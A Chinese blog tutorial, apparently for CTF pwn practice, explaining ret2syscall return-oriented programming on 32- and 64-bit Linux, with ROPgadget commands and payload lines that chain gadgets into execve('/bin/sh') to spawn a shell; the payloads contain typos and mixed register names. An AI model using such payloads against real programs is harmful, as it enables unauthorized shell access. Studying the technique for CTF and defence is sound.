RET2syscall

最新推荐文章于 2024-07-15 15:37:59 发布
最新推荐文章于 2024-07-15 15:37:59 发布
阅读量84 收藏 1
点赞数
分类专栏: PWN 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/T_Fire_of_Square/article/details/135065156
版权

原理

  • 基本rop之一,意为call system,控制程序执行系统调用,获取shell。

X32

我们的目的是要把对应获取 shell 的系统调用的参数放到对应的寄存器中。即:

execve("/bin/sh",NULL,NULL)

向寄存器存放的参数分别为:

  • 系统调用号,即 eax 应该为 0xb “此为execve对应的系统调用号”

  • 第一个参数,即 ebx 应该指向 /bin/sh 的地址,其实执行 sh 的地址也可以。

  • 第二个参数,即 ecx 应该为 0

  • 第三个参数,即 edx 应该为 0

  • int 0x80(触发中断)

    而想要完成参数存入就需要构造rop链,这是就需要这些寄存器的地址了,所以自然而然我们就想到了一个工具:ROP gadgets

    1. eax:

      ROPgadget --binary rop --only 'pop|ret' | grep 'eax'

    2. others:

      ROPgadget --binary rop --only 'pop|ret' | grep 'ebx'

      一般我们可以直接找出ebx,ecx,edx三个寄存器连在一起的地址,这样便于我们直接修改。

      3.bin_sh:

    ROPgadget --binary rop --string '/bin/sh'

    这里我们也可以直接·在ida中shift+12直接找出

    4.int 0x80:

    ROPgadget --binary rop --only 'int'

    之后我们写上payload输出交互就可以了

    payload=b'a'*0ffest+p32(pop_eax_ret)+p32(0x0b)+p32( pop_edx_ecx_ebx_ret)+p32(0x0)+p32(0x0)+p32(bin_sh)+p32(int_0x80)
#offest为s到ebp的偏移量+4  需要使用gbd调试

    EXP:

可以看到 esp 为 0xffffcd40,ebp 为具体的 payload 如下 0xffffcdc8,同时 s 相对于 esp 的索引为 [esp+0x1c],所以,s 的地址为 0xffffcd5c,所以 s 相对于 ebp 的偏移为 0x6C,所以相对于返回地址的偏移为 0x6c+4。

当然,我们也可以通过bp-64h直接看出偏移量,但是这里32位编译器编译出来的位移量是有误的,所以最好还是用gbd运行一下看看

X64

与32位类似,但是传参的寄存器是rdi->rsi->rdx->rcx->r8->r9,即把需要的系统调用号给rax(64位),把rdx,rsi置零(因为是pop释放参数,所以与传参顺序相反)。且ret返回的函数名不同

  • 32位为int 0x80,64位为syscall ret

64位binary下的shell:

  1. rax:59

  2. rdi:bin_sh_addr

  3. rsi:0

  4. rdx:0

  5. rcx:0

  6. syscall

    和32位一样,我们先用ROP找出其中对应的寄存器的地址

  1. rax:

    ROPgadget --binary demo --only 'pop|ret' | grep 'rax'

  2. rsi:

    ROPgadget --binary demo --only 'pop|ret' | grep 'rsi'

  3. bin_sh:

    ROPgadget --binary demo --string '/bin/sh'

  4. syscall:

    ROPgadget --binary demo | grep 'syscall'

  5. rdi:

    ROPgadget --binary demo --only 'pop|ret' | grep 'rdi'

之后写出payload即可

payload=b'a'*offest+rdi_addr+bin_sh+eax_rdx_ebx_addr+p64(0x3b)+p64(0x0)+p64(0X0)+rsi_addr+p64(0x0)+syscall_addr#这里的eax其实就是rax

T_Fire_of_Square
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
带exp的pwn测试文件
09-12
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...
linux syscall详细介绍.docx
11-08
5. 执行完毕后,通过`ret_fast_syscall`指令返回用户态,继续执行`kill()`函数后续的代码。 系统调用不仅提供了安全的内核访问途径,还经过优化以保证性能。在Linux中,上下文切换时间短,系统调用处理流程精简,...
32位汇编语言程序设计罗云彬第2版光盘
05-20
2. **指令集**:32位汇编语言包括一系列指令,如数据处理(如ADD、SUB、MUL)、逻辑运算(如AND、OR、NOT)、控制流程(如JMP、CALL、RET)、输入输出操作等。理解这些指令的含义和用法是编程的基础。 3. **寻址...
x86 x64体系探索及编程 part2
04-18
34 2.5 编程基础 34 2.5.1 操作数寻址 35 2.5.2 传送数据指令 39 2.5.3 位操作指令 45 2.5.4 算术指令 47 2.5.5 CALL 与RET 指令 48 2.5.6 跳转指令 48 2.6 编辑与编译、运行 48 第 3 章编写本书的实验例子 50 3.1 ...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 279
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
Nginx七层(应用层)反向代理:UWSGI代理uwsgi_pass篇
jclee95的个人博客
07-10 1132
Nginx提供了多种应用层反向代理支持,包括proxy_pass、uwsgi_pass、fastcgi_pass和scgi_pass等。其中,proxy_pass指令可以接受一个URL参数,用于实现对HTTP/HTTPS协议的反向代理;uwsgi_pass用于代理到uWSGI应用服务器;fastcgi_pass用于代理到FastCGI服务器;而scgi_pass则用于代理到SCGI(Simple Common Gateway Interface)应用。这些指令使Nginx能够灵活地处理不同类型的后端服务和应
java集合工具类
药的博客
07-12 488
【代码】java集合工具类。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 909
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
CV06_Canny边缘检测算法和python实现
https://github.com/foxpup11?tab=repositories
07-11 869
https://www.bilibili.com/video/BV1qU4y1U7aK/?spm_id_from=333.337.search-card.all.click&vd_source=7dace3632125a1ef7fd32c285eb2fbac
MySQL空间索引
你的指尖有改变世界的力量
07-10 300
空间类型是建立在空间类型字段上的。
一键安装ros及出现问题的解决方案
m0_58173801的博客
07-10 593
catkin_make时出现报错如下。
httpx 的使用
最新发布
qq_39217312的博客
07-15 614
httpx 是一个可以支持 HTTP/2.0 的库还有一个是: hyper 库这里有一个由HTTP/2.0的网站: https://spa16.scrape.center/使用 requests 库 进行爬取 报错:安装: httpx pip3 install httpx 这样安装并不能支持 HTTP/2.0如果想要支持,需要这样安装:pip3 install httpx[http2]输出:这里访问的HTTP/1.0的网站,并且依次打印除了 , 响应状态码(status_code),响应头信息(header
Gradio从入门到精通(1)---快速入门
疯狂飙车的蜗牛的博客
07-15 688
Gradio 是一个开源 Python 包,允许您为机器学习模型、API 或任何任意 Python 函数快速构建演示或 Web 应用程序。然后,您可以使用 Gradio 的内置共享功能在几秒钟内共享指向演示或 Web 应用程序的链接。无需 JavaScript、CSS 或 Web 托管经验!Gradio最大的特点就是简单,便捷,短短几行代码就可以快速构建大模型web应用程序;当前很多人工智能模型的演示都是使用Gradio打造的;您会注意到,为了制作第一个演示,您创建了该类的实例。
sklearn基础教程:掌握机器学习入门的钥匙
AIGC绘图领域探索者,热衷于将创意与技术融合,致力于分享前沿AI绘图技巧与心得,让我们一起开启视觉艺术的新篇章。
07-13 890
是基于Python的一个开源机器学习库,它建立在NumPy、SciPy和matplotlib之上,提供了大量的算法和工具,用于数据挖掘和数据分析。无论是简单的线性回归,还是复杂的神经网络,sklearn都能提供直观易用的接口。作为Python中最为流行的机器学习库之一,以其简洁的API、丰富的算法和强大的功能赢得了广大用户的青睐。通过本文的介绍,相信你已经对sklearn有了初步的了解,并能够开始进行一些基础的机器学习任务。
python学习】闭包的定义与特点,以及一些常用场景的使用
m0_49243785的博客
07-11 1302
闭包是一个函数,闭包让你可以在一个内层函数中访问其外层函数的作用域,可以使用闭包进行模块化代码和封装代码的操作,从而提高效率。
使用Gunicorn提高Web应用的多核并发处理能力
2401_85639015的博客
07-11 948
Gunicorn 是一个基于pre-fork worker模型的WSGI服务器。它能够处理多个工作进程,每个进程可以处理多个请求,这使得它非常适合处理并发请求。兼容性强:支持多种Web框架,如Django、Flask、Pyramid等。高性能:基于pre-fork worker模型,能充分利用多核CPU。易于配置:提供了多种配置方式,包括命令行参数、配置文件和环境变量。稳定性:在生产环境中广泛使用,经过了大量的实践检验。
Python进阶 2024/7/10
weixin_73793099的博客
07-12 262
open()打开函数name:打开的目标文件的字符串,可以包含文件所在的具体路径mode:访问模式,只读,只写,追加encoding:编码格式,推荐使用UTF-8r:只读w:用于写入a:用于追加,如果该文件已经存在,新的内容会被写到已有的内容之后;如果文件不存在,创建新文件进行写入。
编程学单词:delta(希腊字母Δ/δ),差值表示
m0_57158496的博客
07-11 1113
结语:代码编写中,用“通用”字符命名相应变量,是一个不错的好习惯。其一,不用注释,望文生义,简单明了;其二,代码书写形式风格“标准”统一,方便维护和流转。说明:今天我在堆叠代码时发现有delta样子的单词存在,修习之,对代码书写大有裨益。从今以后,我遇到类似的单词,都将在学习笔记中标识、分享。😋回页目录。
构造syscall调用execve的rop
05-28
在构造syscall调用execve的ROP时,我们需要到一些适合我们需要的gadget,以及一个能够满足我们需求的内存区域来存储我们的ROP链。 以下是一个构造syscall调用execve的ROP的示例: ``` ; pop rax ; ret gadget ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值